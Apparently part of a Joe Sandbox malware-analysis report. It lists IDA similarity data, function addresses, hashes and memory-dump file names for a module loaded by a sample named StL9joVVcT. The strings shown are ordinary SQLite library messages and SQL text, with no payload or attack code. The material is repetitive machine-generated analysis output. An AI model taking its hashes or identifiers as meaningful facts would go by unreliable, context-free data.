                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: -$-$-$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                  • API String ID: 0-3831715856
                                                                                                                                                                                                                  • Opcode ID: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                                  • Instruction ID: 718bcd29dd02e548414098bb61d02e6f92929b0b51d4d7d5e0ee85fd3e7d5c12
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38ceaeefa8122eda77a6a4c0540e4d72ea643edef9484be0f76a5f63aed2900a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 055148A273929447D758C63EB822B5E6BC1E7E1340F445235FA81CBBC7E92DE501CB02
                                                                                                                                                                                                                  Function 00007FFD9444CD0F Relevance: 12.2, Strings: 9, Instructions: 991COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %r %s BY term out of range - should be between 1 and %d$INTERSECT$LEFT$MERGE (%s)$ORDER$RIGHT$UNION$too many terms in %s BY clause$g
                                                                                                                                                                                                                  • API String ID: 0-3976573709
                                                                                                                                                                                                                  • Opcode ID: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                                  • Instruction ID: 24e9cc6686ec78b9affa98bee590731bbde818d06766e6b386ee3c7e5561272a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 923cc748c2a532d436179f4fbeec89efe2f6068ec0f17b4356e66b78e043d76d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCB29E72B19A8286EB748F95E4E06BD77A1FB46B84F148036CA4E0775ACF7DE441CB00
                                                                                                                                                                                                                  Function 00007FFD943D3260 Relevance: 11.8, Strings: 9, Instructions: 588COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: cannot open %s column for writing$cannot open table with generated columns: %s$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                  • API String ID: 0-3985037806
                                                                                                                                                                                                                  • Opcode ID: f034e25158e78055e83dcab3338d85cb23f0cdd10e0e8049e84ae0044b790696
                                                                                                                                                                                                                  • Instruction ID: 1ac976bd5b1db9693eccf52249e21e90fc220d0a2818e3d624adf3f6dbd22f46
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f034e25158e78055e83dcab3338d85cb23f0cdd10e0e8049e84ae0044b790696
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B52AF72B08B8285EBB59FA5D4E07B937A4FB46B84F00823ADA4D43756DF39E854C700
                                                                                                                                                                                                                  Function 00007FFD9449E3B0 Relevance: 11.6, Strings: 8, Instructions: 1605COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %d values for %d columns$SCAN %S$UPSERT not implemented for virtual table "%s"$cannot INSERT into generated column "%s"$cannot UPSERT a view$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                                                  • API String ID: 0-458612905
                                                                                                                                                                                                                  • Opcode ID: f67b718e77ddba9dbd2e4bd3dcfe93cd4f63a37029d537b2c9244a4cf76d0f7c
                                                                                                                                                                                                                  • Instruction ID: e4bf2e97a41bcf2b44cf064c0d3b8a28ea01c5a4fbefdb557a2b15f1b06b9026
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f67b718e77ddba9dbd2e4bd3dcfe93cd4f63a37029d537b2c9244a4cf76d0f7c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FF29F32B08A918AEB64CFA5C4A07AD37A1FB46F88F658135DE4D4779ADF78E440D700
                                                                                                                                                                                                                  Function 00007FFD94420390 Relevance: 10.8, Strings: 7, Instructions: 2040COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT segid, term, (pgno>>1), (pgno&1) FROM %Q.'%q_idx' WHERE segid=%d ORDER BY 1, 2$block$misuse
                                                                                                                                                                                                                  • API String ID: 0-1560523725
                                                                                                                                                                                                                  • Opcode ID: 2c3412eefb96d1a96d84cfa8a997987ec19d49dfb8f0e82e2253bfadb9359ed7
                                                                                                                                                                                                                  • Instruction ID: b0e47ff940ee5beadf52c70b0df11f4134924c0b20331dbfe12029b9cbe81d48
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c3412eefb96d1a96d84cfa8a997987ec19d49dfb8f0e82e2253bfadb9359ed7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93234A31B09A4285EBB59FE5D4E43B967A0FB46B88F058135DA4E4779ACFBCE845C300
                                                                                                                                                                                                                  Function 00007FFD944C86B0 Relevance: 10.4, Strings: 8, Instructions: 385COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %!.15g$%02x$%lld$'%.*q'$-- $?$NULL$zeroblob(%d)
                                                                                                                                                                                                                  • API String ID: 0-875588658
                                                                                                                                                                                                                  • Opcode ID: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                                                  • Instruction ID: 691766355c6efed8032b6fc86b40929686f16f19e8bad1e8a92681bbbcf3288d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf43de3a7a1ef586eda6972bc2beddbcc110bd200d6249d6b8ac2510eef92ec7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1202B362F0864289FB71DFE5D5A02FD23A1AF4678AF088036DE0E5669ADEBCD405C341
                                                                                                                                                                                                                  Function 00007FFD944196B0 Relevance: 9.2, Strings: 6, Instructions: 1750COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$DELETE FROM '%q'.'%q_idx' WHERE (segid, (pgno/2)) = (?1, ?2)$REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)$block$misuse
                                                                                                                                                                                                                  • API String ID: 0-1819929800
                                                                                                                                                                                                                  • Opcode ID: db5527f36b2b97d9bb1098062d1d14b256b6f10f84008f80b900de06d0782365
                                                                                                                                                                                                                  • Instruction ID: 47605160b0b707f10f2169edfc945a528a892e3eb18dfc0c23647d8518aa0350
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db5527f36b2b97d9bb1098062d1d14b256b6f10f84008f80b900de06d0782365
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F29F72B0964286EB75DFE5D4E027827A1FB5AB84F058136DA0E5779ADFBCE844C300
                                                                                                                                                                                                                  Function 00007FFD9446D810 Relevance: 9.2, Strings: 7, Instructions: 444COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                  • API String ID: 0-741541785
                                                                                                                                                                                                                  • Opcode ID: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                                                  • Instruction ID: 52758e5c0bf1e7bccdc89310c97915d49a1bda325a26ee8f4aa80ccf4899fa0b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d232b5b87d01dbe22b5cbe3e294ebfdbdc39e8ff610561b42d71e1cb040bb58
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF12C1B2F18B4186E764CBA5D8A02BD37A1FB86754F11813ADE4D4779ADFB8E440CB00
                                                                                                                                                                                                                  Function 00007FFD943D5624 Relevance: 9.2, Strings: 7, Instructions: 440COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: -$-Inf$0123456789ABCDEF0123456789abcdef$NaN$VUUU$gfff$null
                                                                                                                                                                                                                  • API String ID: 0-3207396689
                                                                                                                                                                                                                  • Opcode ID: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
                                                                                                                                                                                                                  • Instruction ID: 6ab2ed857166df7ca3771082b95faedddb67e3c3e489a8c542e1f7b54914276d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3400c222d2f1589d09601d32e5282ad1dca2b0443e562031bc8d258cfde1692b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83026762B4C28185F7399AB894E077D7BE0EB46384F15823ADA8E43AD7CE3ED441C700
                                                                                                                                                                                                                  Function 00007FFD94491320 Relevance: 8.8, Strings: 6, Instructions: 1275COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$PRAGMA %Q.data_version$SELECT pgno FROM '%q'.'%q_idx' WHERE segid=? AND term<=? ORDER BY term DESC LIMIT 1$block$misuse
                                                                                                                                                                                                                  • API String ID: 0-61052504
                                                                                                                                                                                                                  • Opcode ID: 1e74a8d007f9b5171de4f64aa4ac339946924509e5260c63939750b40e8db835
                                                                                                                                                                                                                  • Instruction ID: dc146230a4ad6e0a14c3bafa8c88491e670f87358922d0675956523d65ce6b99
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e74a8d007f9b5171de4f64aa4ac339946924509e5260c63939750b40e8db835
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34D27B32B08A8286FB758B96E4E43B973A0FB46B84F058535CA4D4779ADFBCE445D700
                                                                                                                                                                                                                  Function 00007FFD94485810 Relevance: 8.6, Strings: 6, Instructions: 1130COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                                                                                                                  • API String ID: 0-2646008018
                                                                                                                                                                                                                  • Opcode ID: f9b9b3bea41dc701f105010191532c622e61a6434041d1704a3309d3dbbb02e5
                                                                                                                                                                                                                  • Instruction ID: b4081ae675a48c886645f4825d72269e2cc46ec7230a429f312f6dea12216350
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9b9b3bea41dc701f105010191532c622e61a6434041d1704a3309d3dbbb02e5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B27E31B09A4286FBB99FE595E03B923A1AF46B84F048135DE0D5B79ADFBCE445C340
                                                                                                                                                                                                                  Function 00007FFD944AC3A0 Relevance: 8.4, Strings: 6, Instructions: 920COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Expression tree is too large (maximum depth %d)$a NATURAL join may not have an ON or USING clause$ambiguous reference to %s in USING()$cannot join using column %s - column not present in both tables$coalesce$too many arguments on function %T
                                                                                                                                                                                                                  • API String ID: 0-1975222901
                                                                                                                                                                                                                  • Opcode ID: 1a655264edc91f1296f0f38236cff0e5c6b75a9d26aa47bc254d37a1927e0852
                                                                                                                                                                                                                  • Instruction ID: d67adbc2546a966a1654f663d3a3572e18de52638bd955ed8dce8b52cf147075
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a655264edc91f1296f0f38236cff0e5c6b75a9d26aa47bc254d37a1927e0852
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0792EF72B49A8286E7A0CF55D4A03B97BA4FB46B84F05C136DE4D4778ADF78E441C740
                                                                                                                                                                                                                  Function 00007FFD943FD830 Relevance: 8.2, Strings: 6, Instructions: 738COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$misuse
                                                                                                                                                                                                                  • API String ID: 0-968123305
                                                                                                                                                                                                                  • Opcode ID: 05eb304e3762e0c57ccab2f260750e9ac6452ff08b215d37be61d393f6ace4c9
                                                                                                                                                                                                                  • Instruction ID: 81d179fe22ccbbdd9d31db345d7e663b0ebae051ebfe997c76322f048c7d24fb
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05eb304e3762e0c57ccab2f260750e9ac6452ff08b215d37be61d393f6ace4c9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3172AD21B5968285FBB5AFE594E43B923A1FF86B84F048179DA4E47796DF3CE841C300
                                                                                                                                                                                                                  Function 00007FFD943BA610 Relevance: 8.1, Strings: 6, Instructions: 606COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
